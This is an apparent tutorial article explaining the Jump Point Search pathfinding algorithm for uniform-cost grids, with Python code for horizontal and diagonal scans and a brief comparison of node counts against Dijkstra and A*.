The (A) picture shows the global idea. The algorithms scans a single row from left to right. Each horizontal scan handles a different row. In the section about diagonal scan below, it will be explained how all rows are searched.
At this time, assume the goal is to only scan the b row, rows a and c are done at some other time. The scan starts from a position that has already been done, in this case b1. Such a position is called a parent. The scan goes to the right, as indicated by the green arrow leaving from the b1 position. The (position, direction) pair is also the element stored in open and closed lists. It is possible to have several pairs at the same position but with a different direction in a list.
The goal of each step in the scan is to decide whether the next point (b2 in the picture) is interesting enough to create a new entry in the open list. If it is not, you continue scanning (from b2 to b3, and further). If a position is interesting enough, new entries (new jump points) are made in the list, and the current scan ends.
Positions above and below the parent (a1 and c1) are covered already due to having a parent at the b1 position, these can be ignored. In the [A] picture, position b2 is in open space, the a and c rows are handled by other scans, nothing to see here, we can move on [to b3 and further]. The picture is the same.
The a row is non-passable, the scan at the a row has stopped before, but that is not relevant while scanning the b row.
The [C] picture shows an 'interesting' situation. The scan at the a row has stopped already due to the presence of the non-passable cell at a2 [or earlier]. If we just continue moving to the right without doing anything, position a3 would not be searched. Therefore, the right action here is to stop at position b2, and add two new pairs to the open list, namely (b2, right) and (b2, right-down) as shown in picture [D]. The former makes sure the horizontal scan is continued if useful, the latter starts a search at the a3 position (diagonally down).
After adding both new points, this scan is over and a new point and direction is selected from the open list. The row below is not the only row to check. The row above is treated similarly, except 'down' becomes 'up'.
Two new points are created when c2 is non-passable and c3 is passable. (This may happen at the same time as a2 being non-passable and a3 being passable. In that case, three jump points will be created at b2, for directions right-up, right, and right-down.)
Last but not least, the horizontal scan is terminated when the scan runs into a non-passable cell, or reaches the end of the map. In both cases, nothing special is done, besides terminating the horizontal scan at the row.
Code of the horizontal scan
def search_hor(self, pos, hor_dir, dist): """ Search in horizontal direction, return the newly added open nodes @param pos: Start position of the horizontal scan. @param hor_dir: Horizontal direction (+1 or -1). @param dist: Distance traveled so far. @return: New jump point nodes (which need a parent). """ x0, y0 = pos while True: x1 = x0 + hor_dir if not self.on_map(x1, y0): return [] # Off-map, done. g = grid[x1][y0] if g == OBSTACLE: return [] # Done. if (x1, y0) == self.dest: return [self.add_node(x1, y0, None, dist + HORVERT_COST)] # Open space at (x1, y0). dist = dist + HORVERT_COST x2 = x1 + hor_dir nodes = [] if self.obstacle(x1, y0 - 1) and not self.obstacle(x2, y0 - 1): nodes.append(self.add_node(x1, y0, (hor_dir, -1), dist)) if self.obstacle(x1, y0 + 1) and not self.obstacle(x2, y0 + 1): nodes.append(self.add_node(x1, y0, (hor_dir, 1), dist)) if len(nodes) > 0: nodes.append(self.add_node(x1, y0, (hor_dir, 0), dist)) return nodes # Process next tile. x0 = x1
oordinate (x0, y0) is at the parent position, x1 is next to the parent, and x2 is two tiles from the parent in the scan direction. The code is quite straightforward.
After checking for the off-map and obstacle cases at x1, the non-passable and passable checks are done, first above the y0 row, then below it. If either case adds a node to the nodes result, the continuing horizontal scan is also added, all nodes are returned. The code of the vertical scan works similarly.
Diagonal scan
The diagonal scan uses the horizontal and vertical scan as building blocks, otherwise, the basic idea is the same. Scan the area in the given direction from an already covered starting point, until the entire area is done or until new jump points are found.
The scan direction explained here is diagonally to the right and up. Other scan directions are easily derived by changing 'right' with 'left', and/or 'up' with 'down'. Picture [E] shows the general idea.
Starting from position a1, the goal is to decide if position b2 is a jump point. There are two ways how that can happen. The first way is if a2 (or b1) itself is an 'interesting' position. The second way is if up or to the right new jump points are found.
The first way is shown in picture [F]. When position b1 is non-passable, and c1 is passable, a new diagonal search from position b2 up and to the left must be started. In addition, all scans that would be otherwise performed in the diagonal scan from position a1 must be added. This leads to four new jump points, as shown in picture [G].
Note that due to symmetry, similar reasoning causes new jump points for searching to the right and down, if a2 is non-passable and a3 is passable. (As with the horizontal scan, both c1 and a3 can be new directions to search at the same time as well.) The second way of getting a jump point at position b2 is if there are interesting points further up or to the right.
To find these, a horizontal scan to the right is performed starting from b2, followed by a vertical scan up from the same position. If both scans do not result in new jump points, position b2 is considered done, and the diagonal scan moves to examining the next cell at c3 and so on, until a non-passable cell or the end of the map.
Code of the diagonal scan
def search_diagonal(self, pos, hor_dir, vert_dir, dist): """ Search diagonally, spawning horizontal and vertical searches. Returns newly added open nodes. @param pos: Start position. @param hor_dir: Horizontal search direction (+1 or -1). @param vert_dir: Vertical search direction (+1 or -1). @param dist: Distance traveled so far. @return: Jump points created during this scan (which need to get a parent jump point). """ x0, y0 = pos while True: x1, y1 = x0 + hor_dir, y0 + vert_dir if not self.on_map(x1, y1): return [] # Off-map, done. g = grid[x1][y1] if g == OBSTACLE: return [] if (x1, y1) == self.dest: return [self.add_node(x1, y1, None, dist + DIAGONAL_COST)] # Open space at (x1, y1) dist = dist + DIAGONAL_COST x2, y2 = x1 + hor_dir, y1 + vert_dir nodes = [] if self.obstacle(x0, y1) and not self.obstacle(x0, y2): nodes.append(self.add_node(x1, y1, (-hor_dir, vert_dir), dist)) if self.obstacle(x1, y0) and not self.obstacle(x2, y0): nodes.append(self.add_node(x1, y1, (hor_dir, -vert_dir), dist)) hor_done, vert_done = False, False if len(nodes) == 0: sub_nodes = self.search_hor((x1, y1), hor_dir, dist) hor_done = True if len(sub_nodes) > 0: # Horizontal search ended with a jump point. pd = self.get_closed_node(x1, y1, (hor_dir, 0), dist) for sub in sub_nodes: sub.set_parent(pd) nodes.append(pd) if len(nodes) == 0: sub_nodes = self.search_vert((x1, y1), vert_dir, dist) vert_done = True if len(sub_nodes) > 0: # Vertical search ended with a jump point. pd = self.get_closed_node(x1, y1, (0, vert_dir), dist) for sub in sub_nodes: sub.set_parent(pd) nodes.append(pd) if len(nodes) > 0: if not hor_done: nodes.append(self.add_node(x1, y1, (hor_dir, 0), dist)) if not vert_done: nodes.append(self.add_node(x1, y1, (0, vert_dir), dist)) nodes.append(self.add_node(x1, y1, (hor_dir, vert_dir), dist)) return nodes # Tile done, move to next tile. x0, y0 = x1, y1
The same coordinate system as with the horizontal scan is used here as well. (x0, y0) is the parent position, (x1, y1) is one diagonal step further, and (x2, y2) is two diagonal steps. After map boundaries, obstacle, and destination-reached checking, first checks are done if (x1, y1) itself should be a jump point due to obstacles. Then it performs a horizontal scan, followed by a vertical scan. Most of the code is detection that a new point was created, skipping the remaining actions, and then creating new jump points for the skipped actions. Also, if jump points got added in the horizontal or vertical search, their parent reference is set to the intermediate point. This is discussed further in the next section.
Creating jump points
Creating jump points at an intermediate position, such as at b2 when the horizontal or vertical scan results in new points has a second use. It's a record of how you get back to the starting point. Consider the following situation
Here, a diagonal scan started at a1. At b2 nothing was found. At c3, the horizontal scan resulted in new jump points at position c5. By adding a jump point at position c3 as well, it is easy to store the path back from position c5, as you can see with the yellow line. The simplest way is to store a pointer to the previous (parent) jump point. In the code, I use special jump points for this, which are only stored in the closed list (if no suitable node could be found instead) by means of the get_closed_node method.
Starting point
Finally, a small note about the starting point. In all the discussion before, the parent was at a position which was already done. In addition, scan directions make assumptions about other scans covering the other parts. To handle all these requirements, you first need to check the starting point is not the destination. Secondly, make eight new jump points, all starting from the starting position but in a different direction. Finally pick the first point from the open list to kick off the search.
Performance
I haven't done real performance tests. There is however an elaborate discussion about it in the original paper. However, the test program prints some statistics about the lists.
Dijkstra: open queue = 147 Dijkstra: all_length = 449 A*: open queue = 91 A*: all_length = 129 JPS: open queue = 18 JPS: all_length = 55
The open/closed list implementation is a little different. Rather than moving an entry from the open to the closed list when picking it from the open list, it gets added to an overall list immediately. This list also knows the best found distance for each point, which is used in the decision whether a new point should also be added to the open list as well. The all_length list is thus open + closed together.
To get the length of the closed list, subtract the length of the open list. For the JPS search, a path back to the originating node is stored in the all_length list as well (by means of the get_closed_node). This costs 7 nodes.
As you can see, the Dijkstra algorithm uses a lot of nodes in the lists. Keep in mind however that it determines the distance from the starting point to each node it vists. It thus generates a lot more information than either A* or JPS. Comparing A* and JPS, even in the twisty small area of the example search, JPS uses less than half as many nodes in total. This difference increases if the open space gets bigger, as A* adds a node for each explored point while JPS only add new nodes if it finds new areas behind a corner.
References
The Python3 code is attached to the article. Its aim is to show all the missing pieces of support code from the examples I gave here. It does not produce nifty looking pictures. Dijkstra algorithm Not discussed but a worthy read.
- (Article at Gamedev)
A* algorithm
-
- (Article at Gamedev)
JPS algorithm
- (Wikipedia on JPS)
- (Published article) harabor-grastien-aaai11.pdf
Versions
- 20151024 First release
You need to be a member in order to leave a comment
Sign up for a new account in our community. It's easy!Register a new account
Already have an account? Sign in here.Sign In Now
|
https://www.gamedev.net/articles/programming/artificial-intelligence/jump-point-search-fast-a-pathfinding-for-uniform-cost-grids-r4220/
|
CC-MAIN-2018-39
|
refinedweb
| 2,980
| 73.07
|
I’ve mentioned r/dailyprogrammer in previous posts, since I think they are fun little problems to solve when I have time on my hands. They’re also great problem sets to do when learning a new language.
This time around I decided to do an easy one with haskell.
Nuts and bolts problem description
The goal is stated as:
You have just been hired at a local home improvement store to help compute the proper costs of inventory. The current prices are out of date and wrong; you have to figure out which items need to be re-labeled with the correct price.
You will be first given a list of item-names and their current price. You will then be given another list of the same item-names but with the correct price. You must then print a list of items that have changed, and by how much.
The formal inputs and outputs:. ‘+’ for a growth in price, or ‘-‘ for a loss in price). Order does not matter for output.
And the sample input/output:
Sample Input 1
4
CarriageBolt 45
Eyebolt 50
Washer 120
Rivet 10
CarriageBolt 45
Eyebolt 45
Washer 140
Rivet 10
Sample Output 1
Eyebolt -5
Washer +20
My haskell solution
And here is my haskell solution
[haskell]
module Temp where
import Control.Monad
import Data.List
data Item = Item { name :: String, price :: Integer }
deriving (Show, Read, Ord, Eq)
strToLine :: String -> Item
strToLine str = Item name (read price)
where
name:price:_ = words str
formatPair :: (Item, Item) -> [Char]
formatPair (busted, actual) = format
where
diff = price actual – price busted
direction = if diff > 0 then "+" else "-"
format = name busted ++ " " ++ direction ++ show (abs diff)
getPairs :: IO [(Item, Item)]
getPairs = do
n <- readLn
let readGroup = fmap (sort . map strToLine) (replicateM n getLine)
old <- readGroup
new <- readGroup
let busted = filter (\(a,b) -> a /= b) $ zip old new
return $ busted
printPairs :: IO [(Item, Item)] -> IO [String]
printPairs pairs = fmap (map formatPair) pairs
[/haskell]
I had a lot of fun with this one, since it really forced me to understand and utilize
fmap given that you had to deal with being in the
IO monad. I also liked being “forced” to separate the IO from the pure. I say forced in quotes because it’s really not that helpful to do all your work in the IO function; it’s not reusable.
Also I found that by sticking to strongly typed data I had a more difficult time than if I had just leveraged the fact that the input was really a key value pair. However, the engineer in me knows that things could change, and I hate taking shortcuts. By strongly typing the input data and separating out the parsing function from the code that does filtering and formatting, we could extend the problem set to include other fields without having to jump back to the IO code.
Anyways, things are getting easier with haskell, but I’m still struggling with leveraging all the available libraries and constructs. I guess that just comes with time and practice.
|
https://onoffswitch.net/2014/01/20/daily-programmer/
|
CC-MAIN-2019-47
|
refinedweb
| 507
| 65.66
|
date_part
When you use this function in a query, it extracts the date in specified column in the specified dataset based on the value specified in the parameter
params.
The allowed values are as follows:
- second
- minute
- hour
- day
- dayofweek
- dayofyear
- week
- month
- year
- quarter
- decade
For more information on using query functions and operators in a REST API request, see Queries. For an end-to-end description of how to create a query, see Creating a Query.
{ "version": 0.3, "dataset": "90af668484394fa782cc103409cafe39", "namespace": { "date_extraction": { "source": ["datetime"], "apply": [{ "fn": "date_part", "type": "transform", "params": ["month"] }] } }, "metrics": ["date_extraction"], }
When you submit the above request, the response includes an HTTP status code and a JSON response body.
For more information on the HTTP status codes, see HTTP Status Codes.
For more information on the elements in the JSON structure in the response body, see Query.
|
https://developer.here.com/documentation/geovisualization/topics/query-rule-date-part.html
|
CC-MAIN-2019-04
|
refinedweb
| 142
| 56.39
|
Created on 2008-11-30 16:23 by lcatucci, last changed 2016-09-08 14:38 by christian.heimes.
The enclosed patch does three things:
1. enables SMTP_SSL working: the _get_socket method was setting
self.sock instead of returning the socket to the caller, which
did reset self.sock to None
2. replace home-grown SSLFakeFile() with calls to ssl.socket's makefile()
calls both in the starttls and in the SMTP_SSL cases
3. shutdown sockets before closing them, to avoid server-side piling and
connection refused on connection-limited servers
The last change is just a cosmetical refactoring, but it really helps
the SMTP_SSL case: default_port should really be a class attribute,
instead of being set at __init__ time.
I've reworked the patch into a series, like haypo requested for
poplib and imaplib.
With the closure of 4066 all the tests in the test patch pass, so I'm
lowering the piority of this ticket.
I haven't reviewed the other patches, but the tests in the test patch
appear to be doing tests in the setup method, which doesn't seem like a
good idea.
I still have to apply Catucci's patch (or a modification of) after every Ubuntu installation or upgrade. Otherwise, I get
...
File "/usr/lib/python2.7/smtplib.py", line 752, in __init__
SMTP.__init__(self, host, port, local_hostname, timeout)
File "/usr/lib/python2.7/smtplib.py", line 239, in __init__
(code, msg) = self.connect(host, port)
File "/usr/lib/python2.7/smtplib.py", line 295, in connect
self.sock = self._get_socket(host, port, self.timeout)
File "/usr/lib/python2.7/smtplib.py", line 757, in _get_socket
new_socket = socket.create_connection((host, port), timeout)
File "/usr/lib/python2.7/socket.py", line 571, in create_connection
raise err
socket.error: [Errno 111] Connection refused
But isn't it that #4066 should have solved the critical part this issue pair 4066/4470?
Torsten, can you provide a clear, failing unittest for this?
No, I don't know how to do that. All I can provide is a minimal version of my code that triggers the above mentioned traceback. It is:
import smtplib
s = smtplib.SMTP_SSL("relay-auth.rwth-aachen.de")
s.login("***", "***")
s.sendmail("bronger@physik.rwth-aachen.de", "bronger.randys@googlemail.com"], "Hello")
I hope it helps to understand what I mean.
Sorry, it must be:
import smtplib
s = smtplib.SMTP_SSL("relay-auth.rwth-aachen.de")
s.login("***", "***")
s.sendmail("bronger@physik.rwth-aachen.de", ["bronger.randys@googlemail.com"], "Hello")
(A bracket was missing.)
According to your traceback you should be seeing the error in the first line (the creation of the SMTP_SSL object). If I run that line at the python prompt of python2.7.1, I get your connection failure. If I run it using 2.7 tip (or 3.3 tip), the connection succeeds. I know there have been other fixes in this area, but I don't know which one makes the difference.
Torsten, can you test with 2.7.2 and/or 2.7 tip?
I'm not sure what is left to do in this issue. Do you have an opinion, Lorenzo?
On Fri, 17 Jun 2011, R. David Murray wrote:
RDM>
RDM> R. David Murray <rdmurray@bitdance.com> added the comment:
RDM>
RDM> According to your traceback you should be seeing the error in the
RDM> first line (the creation of the SMTP_SSL object). If I run that line
RDM> at the python prompt of python2.7.1, I get your connection failure.
RDM> If I run it using 2.7 tip (or 3.3 tip), the connection succeeds. I
RDM> know there have been other fixes in this area, but I don't know which
RDM> one makes the difference.
RDM>
RDM> Torsten, can you test with 2.7.2 and/or 2.7 tip?
RDM>
RDM> I'm not sure what is left to do in this issue. Do you have an
RDM> opinion, Lorenzo?
RDM>
Torsten, would you mind letting us know both the python and the .deb
version by running
$ python2.7 --version
and
$ dpkg -l python2.7
At least in debian's python2.7_2.7.1-8, default_port is still an instance
attribute instead of a class attribute.
If the ubuntu situation is the same, the missing patch is
smtplib_01_default_port.diff , and you could work-around the problem by
explicitly calling s = smtplib.SMTP_SSL("relay-auth.rwth-aachen.de", 465).
The patch got in with:
changeset: 69931:bcf04ced5ef1
branch: 2.7
parent: 69915:7c3a20b5943a
user: Antoine Pitrou <solipsis@pitrou.net>
date: Sat May 07 19:59:33 2011 +0200
summary: Issue #11927: SMTP_SSL now uses port 465 by default as
documented. Patch by Kasun Herath.
The last hunk, which fixes LMTP is still missing.
@@ -776,8 +777,9 @@
authentication, but your mileage might vary."""
ehlo_msg = "lhlo"
+ default_port = LMTP_PORT
- def __init__(self, host = '', port = LMTP_PORT, local_hostname =
None):
+ def __init__(self, host = '', port = 0, local_hostname = None):
"""Initialize a new instance."""
SMTP.__init__(self, host, port, local_hostname)
Have a nice week-end, yours
lorenzo
+-------------------------+----------------------------------------------+
| Lorenzo M. Catucci | Centro di Calcolo e Documentazione |
| catucci@ccd.uniroma2.it | Università degli Studi di Roma "Tor Vergata" |
| | Via O. Raimondo 18 ** I-00173 ROMA ** ITALY |
| Tel. +39 06 7259 2255 | Fax. +39 06 7259 2125 |
+-------------------------+----------------------------------------------+
Most of the problems in this issue were solved already so it could almost be closed:
* patch 1 was addressed in #11927
* patch 2 was addressed in #4066
* patches 3 and 4 were addressed in #11893
Torsten's problem was addressed by bcf04ced5ef1.
> I'm not sure what is left to do in this issue.
The only patch remaining is patch 5. I attached an updated version against tip of default branch. My patch mimics shutdown in imaplib.py in that it silences ENOTCONN. However I don't have a test that fails without the shutdown and I don't know if checking ENOTCONN is really needed. I tried to get shutdown to produce ENOTCONN by using Postfix as a server with smtpd_timeout=5s, connecting to it and waiting idle for more than 5 seconds before doing close(). In the Postfix logs I see that Postfix disconnects after 5 seconds of inactivity but doing shutdown afterwards doesn't trigger any exception so the ENOTCONN part remains unexercised.
My patch also adds shutdown method and SHUT_RDWR constant to mock_socket.py since otherwise test_smtplib fails.
(Added Antoine to nosy because he reviewed the patches for #11927 and #11893)
My Python version is "Python 2.7.1+" and the package is called "python2.7 2.7.1-5ubuntu2" (Ubuntu Natty).
Just finished testing both 2.7 and default branches' socket close behaviour, and it seems 05 is not strictly needed.
I'd still prefer if smtplib_05_shutdown_socket_v2.patch since, this way the REMOTE socket close will be unconditionally correct, instead of being dependent on GC artifacts.
I'd still prefer if smtplib_05_shutdown_socket_v2.patch could get in,
^^^^^^^^^^^^^^
since, this way the REMOTE socket close will be unconditionally correct,
instead of being dependent on GC artifacts.
For five Ubuntu releases now, I apply this patch. In contrast to Catalin's statement, it is not solved for me unless the upstream changes of two years ago haven't yet found their way into Ubuntu. I'm currently using Python 2.7.4 on Ubuntu 13.04. That said, the patch solves my issue every time.
When you say "I apply this patch", you mean smtplib_05_shutdown_socket_v2.patch, right?
In any case, I'm growing wary of bugfix regressions right now, so I would only apply the patch on the default branch.
Sorry, after having had another look at it, I realised that I have a different SSMTP issue now, non-Python-related. So for me, Ubuntu 13.04 indeed solves my old issue.
Lorenzo, any chance you could supply a unit test that fails without smtplib_05_shutdown_socket.diff applied?
On Sun, 19 May 2013, R. David Murray wrote:
RDM>
RDM> R. David Murray added the comment:
RDM>
RDM> Lorenzo, any chance you could supply a unit test that fails without
RDM> smtplib_05_shutdown_socket.diff applied?
RDM>
It would really be a functional test, since the problem with half-open
connection pile-up stems from smtp server's access control rules.
To test we should setup a fake smtp server, which forbids having multiple
connections from the same IP address, and connect twice in a row to the
fake server. I'm not sure I'm able to implement both an smtpd.py server
serving more than one connection and the client code in a race-free way in
the same "unit" test. Will try in the next week.
Thank you very much,
lorenzo
The bug is 8 years old and hasn't seen activity for three years. Is SMTP over SSL still broken for you?
|
https://bugs.python.org/issue4470
|
CC-MAIN-2017-47
|
refinedweb
| 1,460
| 68.77
|
Write a Python program to generate a random number (float) between 0 and n. To work with the following functions, we have to import random module.
Remember, the outputs shown below may be different from what you get. Because these python number functions generate random numbers every time you call.
Python random number between 0 and 1
The random() function generates a number between 0 and 1, and the data type will be float. So the below python number generator example returns a random floating point numbers from 0 to 1.
import random rnum = random.random() print(rnum)
0.9625965525945374
Python random integer in a range
The randint() function takes two arguments. First argument is the start value, second argument is the stop value. Here, the start is 0 and the stop is n.
If you want to generate number between a start value and some other value that is not a stop, then use the below code. For instance, the below code returns the number between 10 and 100.
import random as rnd rnum = rnd.randint(10, 100) print(rnum)
70
The randrange() function is really helpful when you need to pick from a range of integers. If you pass in a step value, it will only pick a value from the set of integers by skipping over that many numbers. In the last statement, we pass in an integer after the step val.
import random as rd rnum1 = rd.randrange(10) print(rnum1) rnum2 = rd.randrange(5, 95) print(rnum2) rnum3 = rd.randrange(10, 200, 2) print(rnum3)
2 61 186
If we use the above functions with the combination of for loop, it is beneficial to test or simulate with fake data. By default, the range function skips one number at each step. Thus, we can see that the range doesn’t require a step argument. If you want to skip other.
Because, this tells the for loop to generate an integer for each iteration. The below generates the numbers between 100 and 200.
We also added an extra print statement to print the numbers generated at each for loop iteration. By this python random number generator example, you can understand it better.
import random as rd rndList = [] for i in range(1, 11): rnum = rd.randint(10, 100) rndList.append(rnum) print(rnum) print(rndList)
16 23 72 51 63 78 39 47 80 46 [16, 23, 72, 51, 63, 78, 39, 47, 80, 46]
The following two examples, we haven’t used the import package line. In order to text the second and third example, add the import line from the above.
Within the second example, we used the Python randrange function along with for loop.
rndList = [] for i in range(0, 8): rnum = rd.randrange(5, 95) rndList.append(rnum) print(rnum) print(rndList)
70 62 58 53 44 60 79 73 [70, 62, 58, 53, 44, 60, 79, 73]
In this third example, we used it within the for loop to print five floating point numbers between 0 and 1.
rndList = [] for i in range(1, 11): rnum = rd.randint(10, 100) rndList.append(rnum) print(i, " = ", rnum) print(rndList)
1 = 46 2 = 28 3 = 95 4 = 53 5 = 55 6 = 68 7 = 70 8 = 94 9 = 65 10 = 95 [46, 28, 95, 53, 55, 68, 70, 94, 65, 95]
Python random number between 1 and 10
The Python random module includes a sample() that allows you to select one or more elements from a list or a tuple. You can use the choice function to select one element from a sequence. To use this, pass in a sequence, along with a sample size (how many elements to sample).
It will return a section of elements from the sequence. For example, the below program returns eight numbers between 1 and 10.
import random as rnd rndList = rnd.sample(range(1, 10), 8) print(rndList)
[2, 4, 1, 5, 7, 8, 6, 3]
Here, we allow users to enter the start and stop values and generates the number between those values using different functions. Here, the code might be slightly different from the image because we removed the extra text in it to keep the code simple.
import random as rd s = int(input("Please enter the Starting Value = ")) e = int(input("Please enter the Ending Value = ")) rnum1 = rd.randint(s, e) print("using randint = ", rnum1) rnum2 = rd.randrange(s, e) print("using randrange = ", rnum2) rndList = rd.sample(range(s, e), 7) print("List using sample = ", rndList) rndList1 = [] rndList2 = [] for i in range(0, 7): rnum3 = rd.randint(s, e) rndList1.append(rnum3) rnum4 = rd.randrange(s, e) rndList2.append(rnum4) print("List using randint = ", rndList1) print("List using randrange = ", rndList2)
|
https://www.tutorialgateway.org/python-random-number-generator/
|
CC-MAIN-2022-05
|
refinedweb
| 787
| 74.9
|
Marzipan
What is Marzipan?
Marzipan is a technology that makes it easier to run managed (.NET) code in your native Mac (Cocoa) applications by embedding Mono.
Marzipan is in early development, and was mainly conceived due to the need to host Mono and the managed compiler inside Fire, a project currently under development here at RemObjects. Marzipan is made to do exactly what is needed by Fire, and not much more. That said, it is usable, and we want to make it available for everyone to use. Feedback and contributions are appreciated, and we plan to improve this project moving forward.
Background
Mono is made for embedding, but traditionally, interaction between the native and managed side has been clumsy, with an awkward C-based API. Marzipan fixes this by providing wrapper classes that allow you to (a) interact with the Mono runtime using object oriented APIs and more importantly, (b) interact with your ‘’own’’ classes directly.
Marzipan comes in two parts. ‘’’Part one’’’ is a native Cocoa library you can link into your app that makes it easy to embed Mono, launch up an instance of the Mono runtime, and also takes care of a lot of the background tasks for making everything work. ‘’’Part two’’’ is a code generator that takes your managed .dlls and a small config file that describes what classes you want to expose and generates Cocoa source files for wrapper classes you can use in your native app.
Right now, this second part generates Oxygene or RemObjects C# code, but eventually, we will expand it to support generating Objective-C and Swift code as well.
Requirements
The following requirements exist to run and use Marzipan:
- a 64-bit version of Mono to be either installed globally on the Mac or embedded into your .app (the latter requires a bit of manual work, described below)
- Elements (because as mentioned above, we currently only generate Elements code, no Objective-C or Swift)
Note that currently, Mono only ships as 32-bit version. Since you’re
most likely (especially if you’re using Elements) building 64-bit Mac
apps, you will need to manually build Mono for 64-bit. It’s pretty easy,
and described here,
but it comes down to four simple command line steps to run in Terminal
after you check out mono from git
(replace "
someplace" with a path of your choice):
./autogen.sh --prefix=/someplace/Mono --disable-nls make make install install_name_tool /someplace/Mono/lib/libmono-2.0.dylib -id @loader_path/../Frameworks/libmono-2.0.dylib
The last part is only needed if you want to later embed Mono into your .app bundle (which is recommended if you actually want to ship your app to users without them needing to have Mono installed themselves).
Importing
The next step is to have some .dll(s) with managed code that you want to
expose to your native app, and to create a small .xml config file that
describes what you want to export. Note that Marzipan is pretty good at
marshaling stuff, but there are limitations to what it can do. In
general, most classes that don’t do anything too awkward should export
fine and be usable. If your classes expose other classes as properties
(or expect them as parameters), make sure to include all the classes in
your export config. Any class not exported by Marzipan will be shown
as a black box
MZObject type when used as parameter or result.
An example XML config looks something like this (this is taken from Fire):
<?xml version="1.0" encoding="utf-8"?> <import> <namespace>RemObjects.Fire.ManagedWrapper</namespace> <outputfilename>FireManagedWrapper\ImportedAPI.pas</outputfilename> <outputtype>Oxygene</outputtype> <libraries> <library>..\..\Bin\RemObjects.Oxygene.Tools.dll</library> <library>..\..\Bin\RemObjects.Oxygene.dll</library> <library>..\..\Bin\RemObjects.Oxygene.Fire.ManagedHelper.dll</library> ... </libraries> <types> <type> <name>RemObjects.Oxygene.Fire.ManagedHelper.LogLevel</name> </type> <type> <name>RemObjects.Oxygene.Fire.ManagedHelper.XBuilder</name> </type> <type> <name>RemObjects.Oxygene.Code.Compiler.CodeCompletionCompiler</name> </type> ... </import>
Essentially, you specify the namespace and language type; valid right now are “Oxygene” and “Hydrogene” (for RemObjects C#) to use at the top, followed by the list of .dlls and then the list of types. It does not matter what language or compiler those .dlls were compiled with, as long as they are pure IL assemblies.
You then run MarzipanImporter.exe against this file (you can run it
using
mono MarzipanImporter.exe on the Mac, if you wish), and the
result will be a .pas or .cs file with Cocoa wrappers for all the
classes and types you specified.
Don’t worry about the details of the implementation for these classes — they will look pretty messy, because they do a lot of C-level API fiddling to hook everything up. What matters is the public API of these classes — and you should see all your methods and properties.
You can now add this file to your Mac .app project, add a reference to libMarzipan, and you're ready to use it.
Using Marzipan
Start by adding “RemObjects.Marzipan” to your uses/using clause (or ‘’import’’ing it or the respective libMarzipan.h header file in Swift or Objective-C).
Next, you will want to initialize the Mono runtime and load your dlls. All the following code snippets are RemObjects C#, but the same principles apply no matter what language you use:
var fRuntime: MZMonoRuntime; // class field ... fRuntime := new MZMonoRuntime withDomain('MyApp') appName('"MyApp') version('v4.0.30319') lib(/path/to/mono/etc') etc(/path/to/mono/etc');
MZMonoRuntime _runtime; // class field ... _runtime = new MZMonoRuntime withDomain("MyApp") appName("MyApp") version("v4.0.30319") lib("/path/to/mono/etc") etc("/path/to/mono/etc");
var _runtime: MZMonoRuntime // class field ... _runtime = MZMonoRuntime(domain: "MyApp", appName: "MyApp",version: "v4.0.30319", lib: "/path/to/mono/etc", etc:"/path/to/mono/etc")
Rather than hardcoding the paths, you will probably determine them at
runtime — for example by looking into your bundle to find the embedded
Mono folder in its resources (see below). You will want to hold on to
the
_runtime instance in a global object, so that it does not get
released. That said, once a runtime was instantiated, you can also
always access it globally via
MZMonoRuntime.sharedInstance.
Next, load in the .dll or .dlls that contain your code, as well as any dependent .dlls that won’t be found on their own:
MZMonoRuntime.sharedInstance.loadAssembly("/path/to/MyManagedCode.dll")
Once again you’ll probably want to determine the paths dynamically.
Finally, as the very last step, you need to make sure to attach Mono to each thread that you want to use it on. If all your code is on the main thread, just call this once; if you create threads or use GCD queues, you’ll need to call it at least once (you can call it again without harm) the first time you call into managed code on any given thread.
Keep in mind that GCD queues will use random/new threads. Even serial queues do not always use the same thread for each block.
MZMonoRuntime.sharedInstance.attachToThread()
And with that, you’re set up and ready to use your own classes as imported. Just new them up (or alloc/init them up) as you always do and call their methods as if they were native Cocoa classes.
Building your .app
There are a couple of items to note for building your .app:
- Most likely, you'll want to embed the Mono folder into your bundle as resource. Just add it to your project. In Visual Studio or Fire, set the build action to "AppResource". In Xcode, make sure to add it as "Folder Reference" (it will show up as blue folder icon, not yellow) and add it to the Copy Files build phase, alongside your other resources.
- You will need to link against libmono-2.0.dylib (or libmono-2.0.fx) and have libmono-2.0.dylib copied into your app bundle into the
Frameworksfolder. In Xcode, you will need to create a new build phase for it. In Visual Studio or Fire, just set the build action to AppFramework after adding the file to the project (you'll want to add both the .fx file as reference and the .dylib file as resource with the AppFramework build action). Make sure to use the version of libmono-2.0.dylib that's part of your actual Mono build, as the versions need to match.
- You will also need to embed all your .dlls to be packaged into the resource folder, as well (just as regular AppResource file resources).
You can use the following code to locate the Mono folder at runtime for
passing to the
new MZMonoRuntime ... call shown above:
var lMonoPath := NSBundle.mainBundle.pathForResource('Mono') ofType('');
var monoPath = NSBundle.mainBundle.pathForResource("Mono") ofType("");
let monoPath = NSBundle.mainBundle.pathForResource("Mono", ofType: "")
The same works for locating your .dlls:
var lMyDll := NSBundle.mainBundle.pathForResource('MyManagedAssembly') ofType('dll') inDirectory('');
var myDll = NSBundle.mainBundle.pathForResource("MyManagedAssembly") ofType("dll") inDirectory("");
let myDll = NSBundle.mainBundle.pathForResource("MyManagedAssembly", ofType: "dll", inDirectory: "");
|
https://docs.elementscompiler.com/Tools/Marzipan/
|
CC-MAIN-2018-43
|
refinedweb
| 1,510
| 57.16
|
On 10/08/2012, at 12:53 AM, Prasanna Santhanam <prasanna.santhanam@citrix.com> wrote:
>
> There are no issues with the apache confluence. Probably better than
> wiki.cloudstack because it still does wiki markup rather than just
> rich text edits. Pages might look differently-formatted so wanted to
> alert people.
Ah, that's just because it is back on Confluence 3.x. So that might hinder your ability to
import from the newer version - I'm not sure when ASF plans to upgrade but probably not on
a timeline that suits what you're trying to do. Sorry for the misdirection.
If you can find a way around the version difference, the main thing I remember being a challenge
was mapping users. I probably have some notes around if you bump into that.
- Brett
--
Brett Porter
brett@apache.org
|
http://mail-archives.apache.org/mod_mbox/incubator-cloudstack-dev/201208.mbox/%3C98CD6154-600D-4DB1-81F5-35BD534D3A09@apache.org%3E
|
CC-MAIN-2017-39
|
refinedweb
| 139
| 68.36
|
In the C standard, there is a defined library on time and date declared in "time.h". The library is not limited to embedded applications, and widely used in order to obtain information about time and date. This library is supported by IAR Embedded Workbench, and in this article we will take a look at how to use it in the toolchain.
The time and date library of the C language is defined in time.h. This header includes data types with respect to time, constants and functions:
In embedded systems, you need to write code that calculates the date and time in order to use the time.h functions. We introduce two cases for how to use and implement the time library in IAR Embedded Workbench.
